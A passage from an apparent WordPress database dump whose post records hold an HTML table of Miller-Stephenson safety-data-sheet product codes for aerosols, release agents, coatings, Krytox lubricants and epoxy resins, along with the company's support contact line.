Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-222F</td>\r\n<td style="text-align: center;">MS-126H</td>\r\n<td style="text-align: center;">MS-122E</td>\r\n<td style="text-align: center;">MS-467C</td>\r\n<td style="text-align: center;">AUT 523</td>\r\n<td style="text-align: center;">MS-907 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-242L</td>\r\n<td style="text-align: center;">MS-126HUV</td>\r\n<td style="text-align: center;">MS-122E RED</td>\r\n<td style="text-align: center;">MS-470C</td>\r\n<td style="text-align: center;">AUT 1045</td>\r\n<td style="text-align: center;">MS-908 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-242L-AS</td>\r\n<td style="text-align: center;">MS-383A</td>\r\n<td style="text-align: center;">MS-122SE</td>\r\n<td style="text-align: center;">MS-472C</td>\r\n<td style="text-align: center;">AUT 2045</td>\r\n<td style="text-align: center;">MS-908 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-242N</td>\r\n<td style="text-align: center;">MS-383H</td>\r\n<td style="text-align: center;">MS-122SD</td>\r\n<td style="text-align: center;">MS-470S</td>\r\n<td style="text-align: center;">AUT 2245</td>\r\n<td style="text-align: center;">MS-910 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-242N-AS</td>\r\n<td style="text-align: center;">MS-383HUV</td>\r\n<td style="text-align: center;">MS-122XD</td>\r\n<td style="text-align: center;">MS-472S</td>\r\n<td style="text-align: center;">143 SERIES</td>\r\n<td style="text-align: center;">MS-910 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381H</td>\r\n<td style="text-align: center;">MS-252</td>\r\n<td style="text-align: center;">MS-132FE</td>\r\n<td style="text-align: center;">MS-475C</td>\r\n<td style="text-align: center;">GPL 10X SERIES</td>\r\n<td style="text-align: center;">HELOXY 48</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HM</td>\r\n<td style="text-align: center;">MS-257</td>\r\n<td style="text-align: center;">MS-136W</td>\r\n<td style="text-align: center;">MS-477C</td>\r\n<td style="text-align: center;">GPL 246</td>\r\n<td style="text-align: center;">HELOXY 61</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HUV</td>\r\n<td style="text-align: center;">MS-262</td>\r\n<td style="text-align: center;">MS-143AX</td>\r\n<td style="text-align: center;">G0831B</td>\r\n<td style="text-align: center;">GPL 255</td>\r\n<td style="text-align: center;">HELOXY 62</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HMUV</td>\r\n<td style="text-align: center;">MS-282</td>\r\n<td style="text-align: center;">MS-143E</td>\r\n<td style="text-align: center;">Y0110A</td>\r\n<td style="text-align: center;">157FS</td>\r\n<td style="text-align: center;">HELOXY 67</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HC</td>\r\n<td style="text-align: center;">MS-532</td>\r\n<td style="text-align: center;">MS-143E-1</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 20X SERIES</td>\r\n<td style="text-align: center;">HELOXY 68</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HCM</td>\r\n<td style="text-align: center;">MS-539</td>\r\n<td style="text-align: center;">MS-143E-2</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 21X SERIES</td>\r\n<td style="text-align: center;">HELOXY 71</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HCUV</td>\r\n<td style="text-align: center;">MS-552</td>\r\n<td style="text-align: center;">MS-143E-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 22X SERIES</td>\r\n<td style="text-align: center;">HELOXY 107</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HCMUV</td>\r\n<td style="text-align: center;">MS-557</td>\r\n<td style="text-align: center;">MS-143E-10</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 226FG, 227FG</td>\r\n<td style="text-align: center;">HELOXY 116</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-250</td>\r\n<td style="text-align: center;">MS-562</td>\r\n<td style="text-align: center;">MS-143E BLUE</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">240 SERIES</td>\r\n<td style="text-align: center;">HELOXY 505</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-250M</td>\r\n<td style="text-align: center;">MS-582</td>\r\n<td style="text-align: center;">MS-143E RED</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">250 SERIES</td>\r\n<td style="text-align: center;">BISPHENOL A-157</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-250SP</td>\r\n<td style="text-align: center;">MS-702</td>\r\n<td style="text-align: center;">MS-143H</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">280 SERIES</td>\r\n<td style="text-align: center;">EPON RESIN 164</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-255</td>\r\n<td style="text-align: center;">MS-722</td>\r\n<td style="text-align: center;">MS-143H-1</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">283 SERIES</td>\r\n<td style="text-align: center;">EPON RESIN SU 8</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-255M</td>\r\n<td style="text-align: center;">MS-727</td>\r\n<td style="text-align: center;">MS-143H-2.5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 29X SERIES</td>\r\n<td style="text-align: center;">EPON RESIN 813</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-260</td>\r\n<td style="text-align: center;">MS-732</td>\r\n<td style="text-align: center;">MS-143H-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 407</td>\r\n<td style="text-align: center;">EPON RESIN 815C</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-260M</td>\r\n<td style="text-align: center;">MS-739</td>\r\n<td style="text-align: center;">MS-143H-10</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EG 2000, 3000</td>\r\n<td style="text-align: center;">EPON RESIN 825</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-280</td>\r\n<td style="text-align: center;">MS-747</td>\r\n<td style="text-align: center;">MS-143H BLUE</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">FPG SERIES</td>\r\n<td style="text-align: center;">EPON RESIN 826</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-530</td>\r\n<td style="text-align: center;">MS-752</td>\r\n<td style="text-align: center;">MS-143H RED</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">LINEAR GREASE</td>\r\n<td style="text-align: center;">EPON RESIN 828</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-538</td>\r\n<td style="text-align: center;">MS-752U</td>\r\n<td style="text-align: center;">MS-143 TE</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">LINEAR OIL</td>\r\n<td style="text-align: center;">EPON RESIN 830</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-550</td>\r\n<td style="text-align: center;">MS-757</td>\r\n<td style="text-align: center;">MS-143XD</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">LVP</td>\r\n<td style="text-align: center;">EPON RESIN 834</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-555</td>\r\n<td style="text-align: center;">MS-762</td>\r\n<td style="text-align: center;">MS-143XD-1</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8990</td>\r\n<td style="text-align: center;">EPON RESIN 862</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-560</td>\r\n<td style="text-align: center;">MS-767</td>\r\n<td style="text-align: center;">MS-143XD-2</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8906A</td>\r\n<td style="text-align: center;">EPON RESIN 872</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-580</td>\r\n<td style="text-align: center;">MS-772</td>\r\n<td style="text-align: center;">MS-143XD-2.5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8908</td>\r\n<td style="text-align: center;">EPON RESIN 1001F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-700</td>\r\n<td style="text-align: center;">MS-777</td>\r\n<td style="text-align: center;">MS-143XD-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8950</td>\r\n<td style="text-align: center;">EPON RESIN 1002F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-700M</td>\r\n<td style="text-align: center;">MS-782</td>\r\n<td style="text-align: center;">MS-143XD-10</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8980</td>\r\n<td style="text-align: center;">EPON RESIN 1004F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-720</td>\r\n<td style="text-align: center;">MS-787</td>\r\n<td style="text-align: center;">MS-145W</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT GREASE</td>\r\n<td style="text-align: center;">EPON RESIN 1007F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-720M</td>\r\n<td style="text-align: center;">MS-797</td>\r\n<td style="text-align: center;">MS-145W-4</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PFPE OIL W/SOLUBLE ADDITIVE</td>\r\n<td style="text-align: center;">EPON RESIN 1031</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-720L</td>\r\n<td style="text-align: center;">MS-110XB</td>\r\n<td style="text-align: center;">MS-153BN</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PFPE GREASE SOLUBLE ADDITIVE</td>\r\n<td style="text-align: center;">EPON RESIN 1050</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-725</td>\r\n<td style="text-align: center;">MS-1010</td>\r\n<td style="text-align: center;">A0305B</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PFPE OILS</td>\r\n<td style="text-align: center;">EPON RESIN 1163</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-725M</td>\r\n<td style="text-align: center;">MS-2010</td>\r\n<td style="text-align: center;">K1206A</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">TS4 SEALANT</td>\r\n<td style="text-align: center;">EPON RESIN 8021</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-730</td>\r\n<td style="text-align: center;">MS-31XXMD</td>\r\n<td style="text-align: center;">Y0717A</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">VACUUM PUMP FLUID</td>\r\n<td style="text-align: center;">EPON RESIN 8132</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-730M</td>\r\n<td style="text-align: center;">MS-32XXMD</td>\r\n<td style="text-align: center;">Vydax NRT 960</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">VACUUM PUMP FLUID XP</td>\r\n<td style="text-align: center;">EPON RESIN 8280</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-730L</td>\r\n<td style="text-align: center;">X-P35</td>\r\n<td style="text-align: center;">RA/IPA-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-500AF</td>\r\n<td style="text-align: center;">EPON RESIN 8281</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-738</td>\r\n<td style="text-align: center;">H0805B</td>\r\n<td style="text-align: center;">RA/IPA-15</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-OILS</td>\r\n<td style="text-align: center;">EPON RESIN 58005</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-738M</td>\r\n<td style="text-align: center;">H1112B</td>\r\n<td style="text-align: center;">DryFilm RA/IPA</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-AC, ACX</td>\r\n<td style="text-align: center;">EPON RESIN 58034</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-745</td>\r\n<td style="text-align: center;">Vertrel SDG</td>\r\n<td style="text-align: center;">DryFilm RA</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-BD, BDX, BDZ</td>\r\n<td style="text-align: center;">EPONEX 1510</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-750</td>\r\n<td style="text-align: center;">Vertrel SFR</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-S, SX, SZ</td>\r\n<td style="text-align: center;">EPI-REZ WD-510</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-750M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 2E SERIES</td>\r\n<td style="text-align: center;">EPI-REZ 3522-W-60</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-755</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PCA,PRO,SG</td>\r\n<td style="text-align: center;">EPI-REZ 5003-W-55</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-755M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPI-REZ 5520-W-60</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-755L</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPI-REZ 5522-WY-55</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-760</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3015</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-760M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3046</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-765</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3055</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-770</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3115</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-770M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3125</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-775</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3140</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-775M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-780</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3164</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-780M</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3223</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-795</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3234</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-795M</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3245</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-110X</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3253</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-120X</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3270</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-120X-XP</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3271</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">H0805A</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3274</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">J0912A</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3282</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">K0725A</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3290</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">K1016A</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3295</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">CURING AGENT W</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">ANCAMINE K54</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">ANCAMINE K61B</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">BDMA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">BF3-400</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">DEAPA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">NMA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">VERSAMID 115</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">VERSAMID 125</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">VERSAMID 140</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2016-09-20 13:56:41', '2016-09-20 13:56:41', '', 1842, 'https://132.148.10.86/wordpress/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1848, 2, '2016-09-20 13:58:01', '2016-09-20 13:58:01', '<h1>Miller-Stephenson SDS data base.</h1>\r\nif you are unable yo locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 800-992-2424 (8-4 E.T.)\r\n<table width="1119">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Liquid</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Release Agents</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Conformal Coatings</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Krytox</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Epoxy</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-124H</td>\r\n<td style="text-align: center;">MS-111</td>\r\n<td style="text-align: center;">MS-122AD</td>\r\n<td style="text-align: center;">MS-452N</td>\r\n<td style="text-align: center;">AGL 683</td>\r\n<td style="text-align: center;">MS-900</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-222L</td>\r\n<td style="text-align: center;">MS-114C</td>\r\n<td style="text-align: center;">MS-122AD RED</td>\r\n<td style="text-align: center;">MS-460H</td>\r\n<td style="text-align: center;">AT</td>\r\n<td style="text-align: center;">MS-905 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-222N</td>\r\n<td style="text-align: center;">MS-115</td>\r\n<td style="text-align: center;">MS-122ADL</td>\r\n<td style="text-align: center;">MS-462H</td>\r\n<td style="text-align: center;">ATA</td>\r\n<td style="text-align: center;">MS-905 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-222T</td>\r\n<td style="text-align: center;">MS-182SD</td>\r\n<td style="text-align: center;">MS-122AV</td>\r\n<td style="text-align: center;">MS-465C</td>\r\n<td style="text-align: center;">AUT 2A45</td>\r\n<td style="text-align: center;">MS-907 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-222F</td>\r\n<td style="text-align: center;">MS-126H</td>\r\n<td style="text-align: center;">MS-122E</td>\r\n<td style="text-align: center;">MS-467C</td>\r\n<td style="text-align: center;">AUT 523</td>\r\n<td style="text-align: center;">MS-907 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-242L</td>\r\n<td style="text-align: center;">MS-126HUV</td>\r\n<td style="text-align: center;">MS-122E RED</td>\r\n<td style="text-align: center;">MS-470C</td>\r\n<td style="text-align: center;">AUT 1045</td>\r\n<td style="text-align: center;">MS-908 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-242L-AS</td>\r\n<td style="text-align: center;">MS-383A</td>\r\n<td style="text-align: center;">MS-122SE</td>\r\n<td style="text-align: center;">MS-472C</td>\r\n<td style="text-align: center;">AUT 2045</td>\r\n<td style="text-align: center;">MS-908 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-242N</td>\r\n<td style="text-align: center;">MS-383H</td>\r\n<td style="text-align: center;">MS-122SD</td>\r\n<td style="text-align: center;">MS-470S</td>\r\n<td style="text-align: center;">AUT 2245</td>\r\n<td style="text-align: center;">MS-910 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-242N-AS</td>\r\n<td style="text-align: center;">MS-383HUV</td>\r\n<td style="text-align: center;">MS-122XD</td>\r\n<td style="text-align: center;">MS-472S</td>\r\n<td style="text-align: center;">143 SERIES</td>\r\n<td style="text-align: center;">MS-910 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381H</td>\r\n<td style="text-align: center;">MS-252</td>\r\n<td style="text-align: center;">MS-132FE</td>\r\n<td style="text-align: center;">MS-475C</td>\r\n<td style="text-align: center;">GPL 10X SERIES</td>\r\n<td style="text-align: center;">HELOXY 48</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HM</td>\r\n<td style="text-align: center;">MS-257</td>\r\n<td style="text-align: center;">MS-136W</td>\r\n<td style="text-align: center;">MS-477C</td>\r\n<td style="text-align: center;">GPL 246</td>\r\n<td style="text-align: center;">HELOXY 61</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HUV</td>\r\n<td style="text-align: center;">MS-262</td>\r\n<td style="text-align: center;">MS-143AX</td>\r\n<td style="text-align: center;">G0831B</td>\r\n<td style="text-align: center;">GPL 255</td>\r\n<td style="text-align: center;">HELOXY 62</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HMUV</td>\r\n<td style="text-align: center;">MS-282</td>\r\n<td style="text-align: center;">MS-143E</td>\r\n<td style="text-align: center;">Y0110A</td>\r\n<td style="text-align: center;">157FS</td>\r\n<td style="text-align: center;">HELOXY 67</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HC</td>\r\n<td style="text-align: center;">MS-532</td>\r\n<td style="text-align: center;">MS-143E-1</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 20X SERIES</td>\r\n<td style="text-align: center;">HELOXY 68</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HCM</td>\r\n<td style="text-align: center;">MS-539</td>\r\n<td style="text-align: center;">MS-143E-2</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 21X SERIES</td>\r\n<td style="text-align: center;">HELOXY 71</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HCUV</td>\r\n<td style="text-align: center;">MS-552</td>\r\n<td style="text-align: center;">MS-143E-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 22X SERIES</td>\r\n<td style="text-align: center;">HELOXY 107</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HCMUV</td>\r\n<td style="text-align: center;">MS-557</td>\r\n<td style="text-align: center;">MS-143E-10</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 226FG, 227FG</td>\r\n<td style="text-align: center;">HELOXY 116</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-250</td>\r\n<td style="text-align: center;">MS-562</td>\r\n<td style="text-align: center;">MS-143E BLUE</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">240 SERIES</td>\r\n<td style="text-align: center;">HELOXY 505</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-250M</td>\r\n<td style="text-align: center;">MS-582</td>\r\n<td style="text-align: center;">MS-143E RED</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">250 SERIES</td>\r\n<td style="text-align: center;">BISPHENOL A-157</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-250SP</td>\r\n<td style="text-align: center;">MS-702</td>\r\n<td style="text-align: center;">MS-143H</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">280 SERIES</td>\r\n<td style="text-align: center;">EPON RESIN 164</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-255</td>\r\n<td style="text-align: center;">MS-722</td>\r\n<td style="text-align: center;">MS-143H-1</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">283 SERIES</td>\r\n<td style="text-align: center;">EPON RESIN SU 8</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-255M</td>\r\n<td style="text-align: center;">MS-727</td>\r\n<td style="text-align: center;">MS-143H-2.5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 29X SERIES</td>\r\n<td style="text-align: center;">EPON RESIN 813</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-260</td>\r\n<td style="text-align: center;">MS-732</td>\r\n<td style="text-align: center;">MS-143H-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 407</td>\r\n<td style="text-align: center;">EPON RESIN 815C</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-260M</td>\r\n<td style="text-align: center;">MS-739</td>\r\n<td style="text-align: center;">MS-143H-10</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EG 2000, 3000</td>\r\n<td style="text-align: center;">EPON RESIN 825</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-280</td>\r\n<td style="text-align: center;">MS-747</td>\r\n<td style="text-align: center;">MS-143H BLUE</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">FPG SERIES</td>\r\n<td style="text-align: center;">EPON RESIN 826</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-530</td>\r\n<td style="text-align: center;">MS-752</td>\r\n<td style="text-align: center;">MS-143H RED</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">LINEAR GREASE</td>\r\n<td style="text-align: center;">EPON RESIN 828</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-538</td>\r\n<td style="text-align: center;">MS-752U</td>\r\n<td style="text-align: center;">MS-143 TE</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">LINEAR OIL</td>\r\n<td style="text-align: center;">EPON RESIN 830</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-550</td>\r\n<td style="text-align: center;">MS-757</td>\r\n<td style="text-align: center;">MS-143XD</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: 